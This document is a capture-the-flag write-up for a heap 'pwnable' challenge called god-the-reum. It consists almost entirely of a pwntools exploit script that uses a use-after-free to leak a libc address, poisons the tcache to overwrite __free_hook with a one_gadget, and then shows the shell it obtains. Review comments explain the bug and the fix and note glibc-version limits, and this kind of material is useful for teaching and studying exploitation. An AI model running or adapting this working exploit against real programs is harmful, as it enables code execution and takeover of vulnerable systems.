Category : pwnable
Summary : use-after-free, tcache, __free_hook
Exploit
#!/usr/bin/python
from pwn import *
def cmd_create(amount):
    """Drive menu option 1 (create) and answer its single prompt with *amount*.

    Every value is sent only after the program has printed a ': ' prompt, so the
    exchange stays in lock-step with the target's menu loop.  *amount* is
    stringified before sending; its meaning is decided by the caller.
    Requires the module-level ``ru``/``sl`` tube aliases to be bound first.
    """
    for answer in (1, amount):
        ru(': ')
        sl(str(answer))
def cmd_deposit(wallet_no, amount):
    """Drive menu option 2 (deposit) for wallet *wallet_no* with *amount*.

    The three answers -- menu choice, wallet index, amount -- are each sent
    after the program's ': ' prompt, in that order.  Uses the module-level
    ``ru``/``sl`` aliases.
    """
    answers = [2, wallet_no, amount]
    for answer in answers:
        ru(': ')
        sl(str(answer))
def cmd_withdraw(wallet_no, amount):
    """Drive menu option 3 (withdraw) for wallet *wallet_no* with *amount*.

    Sends the menu choice, then the wallet index, then the amount, waiting for
    the ': ' prompt before each.  Uses the module-level ``ru``/``sl`` aliases.
    """
    def _answer(value):
        # One prompt/response round trip; everything goes over as text.
        ru(': ')
        sl(str(value))

    _answer(3)
    _answer(wallet_no)
    _answer(amount)
def cmd_show():
    """Drive menu option 4 (show) and return every listed balance as an int.

    After the list header, each line is expected to contain the literal
    'ballance ' (sic -- this matches the program's own output) followed by a
    number; the first empty line ends the list.  Balances are returned in the
    order the program printed them.  A line without 'ballance ' raises
    IndexError, as in the original.  Uses the module-level ``ru``/``sl``/``rl``
    aliases.
    """
    ru(': ')
    sl(str(4))
    ru('========== My Wallet List =============\n')
    balances = []
    # recvline(keepends=False): an empty string marks the end of the list.
    line = rl(False)
    while line != '':
        balances.append(int(line.split('ballance ')[1]))
        line = rl(False)
    return balances
def cmd_new_eth(wallet_no, new_eth):
    """Drive menu option 6 for wallet *wallet_no* and send *new_eth* verbatim.

    Unlike the other wrappers, the final value is NOT passed through str(), so
    callers may hand over packed binary data (the script passes p64(...)).
    Uses the module-level ``ru``/``sl`` aliases.
    """
    selection = str(6)
    target = str(wallet_no)
    for payload in (selection, target, new_eth):
        ru(': ')
        sl(payload)
s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)
# Short aliases for the tube I/O used by the cmd_* helpers defined above.
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
# Two wallets of different sizes; the trailing "# N" comments are the list
# indices the program assigns (consistent with cmd_show's print order).
cmd_create(0x420) # 0
cmd_create(0x50) # 1
# Withdrawing the full balance frees the wallet's chunk (per the original
# "# free" notes) while the entry stays listed -- this dangling entry is the
# use-after-free named in the summary.  The program-side fix is to drop or
# null the entry when it is freed.
cmd_withdraw(0, 0x420) # free
cmd_withdraw(1, 0x50) # free
# The freed 0x420 wallet still prints its "balance"; the value read back is
# presumably an allocator pointer into libc (the name and the subtraction
# below say so) -- the information disclosure half of the bug.
libc_leak, _= cmd_show()
# NOTE(review): these offsets are tied to one specific glibc build; they are
# not portable and are the first thing to break on another libc.  malloc_hook
# is computed but never used.
libc_base = libc_leak - 0x3ebca0
malloc_hook = libc_base + 0x3ebc30
free_hook = libc_base + 0x3ed8e8
libc_one_gadget = libc_base + 0xe569f
# Writing into freed wallet 1 overwrites its tcache next pointer; the original
# debugger note on the next line shows the resulting tcache entry.
cmd_new_eth(1, p64(free_hook))
# (0x60) tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8
# Two same-size allocations: the first reuses wallet 1's chunk, the second is
# handed out at the forged address, so wallet 3 aliases __free_hook.
cmd_create(0x50) # 2
cmd_create(0x50) # 3
cmd_new_eth(3, p64(libc_one_gadget))
# The next free() (withdraw of wallet 2) goes through the overwritten hook.
# NOTE(review): __free_hook/__malloc_hook were removed in glibc 2.34, so this
# hook-overwrite technique does not apply to current libcs.
cmd_withdraw(2, 0x50)
ru('withdraw? : ')
s.interactive()
s.close()
$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)